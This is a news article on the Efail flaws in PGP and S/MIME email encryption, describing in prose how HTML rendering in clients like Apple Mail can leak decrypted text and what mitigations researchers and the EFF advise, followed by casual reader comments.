Vulnerabilities have been discovered in PGP and S/MIME that could allow an attacker to read emails encrypted using the standards, with one attack potentially allowing for a message to be decrypted by abusing a flaw in the way Mail for iOS and macOS renders HTML-based messages.
European security researchers have published a warning about the so-called "Efail" attacks, explaining there are two varieties that cause an issue for those using PGP and S/MIME plug-ins to secure their communications in email clients. Vulnerabilities in the OpenPGP and S/MIME standards enable the attacks to occur, which is said to affect emails sent to the victim, including those received months or years ago.
The attacks work by abusing how an email client renders HTML content included in a message, such as by loading externally-hosted images, in an email account the attacker is either capable of accessing or can eavesdrop. The attacker effectively alters one of the acquired encrypted emails, sends it to the victim's account.
When opened and decrypted, the email client accesses the external content, which at the same time send the plaintext sections of the email to the attacker.
The researchers from three European universities write the direct approach can affect "Apple Mail, iOS Mail, and Mozilla Thunderbird," which can be patched to stop the "Direct Exfiltration" method from working. It is unclear if Apple has supplied patches to fix the vulnerability, but it is likely a solution is on the way if it has not yet been deployed.
A second method, termed the "CBC/CFB Gadget Attack," is claimed to affect any standards-confirming email client, and is also patchable. The researchers advise that, in the long term, "it is necessary to update the specification (for OpenPGP and S/MIME) to find and document changes that fix the underlying root cause."
The second method is more involved, requiring the precise modification of plaintext blocks if the attacker knows elements of the message. By changing certain blocks to inject an image tag into the encrypted section, the plaintext message can then get sent to the attacker once the malformed encrypted message is opened by the victim.
To mitigate the attack in the short term, the researchers advise users to disable HTML rendering for incoming messages in email clients. In cases where the email client doesn't decrypt messages, it is advised the best way to open the messages safely would be to use a separate application entirely, as this would prevent the opening of exfiltration channels.
The Electronic Frontier Foundation's advisory also warns users to disable encryption plugins in their clients, including GPGTools for Apple Mail and Enigmail for Thunderbird.
The researchers plan to release full details of the vulnerabilities and the attacks in a paper on Tuesday morning at 3am eastern time. Today's announcement is said by the EFF to be a warning to the "wider PGP user community in advance of its full publication."
6 Comments
Nice to know about security issues that need to be fixed but I’d also like to know if any of these things ever gain real traction in the wild. We read a report like this, the nervous Nellies and paranoid Phils go apeshit and run around with their hair on fire heaping recriminations on Apple and anyone else involved. The we never hear about them again. This article advises users to disable HTML rendering, which I will not do because I don’t encrypt email to begin with and this attack vector seems attractive only to state actors targeting specific individuals. So if you are a bad guy or spy you may want to take care I suppose. And if you are one those who encrypt your email to your aunt Betty then that’s your problem.
Apple has always been the most secure. They will fix it for us. I never trusted the EFF.
I sure hope that, while Apple works on this issue, it’ll spur them to consolidate their S/MIME implementation (or even add native support to PGP/GPG). As it’s stands now, iOS Mail won’t recognize the S/MIME certificates I generated in macOS keychain (even though Apple Mail, in macOS has no trouble with them).
I mean, how much of a trouble would be for Apple to act as a CA, issuing certificates for our @mac, @me, and @icloud emails. It would go right along with their privacy values.
To avoid backslash, make it opt in, so the tech illiterate, who would fluster with an s/mime attachment on their webmail (eww...), don’t die from brain hemorrhage.
Meh - not a big deal really. Plus I use the GMail iOS app anyway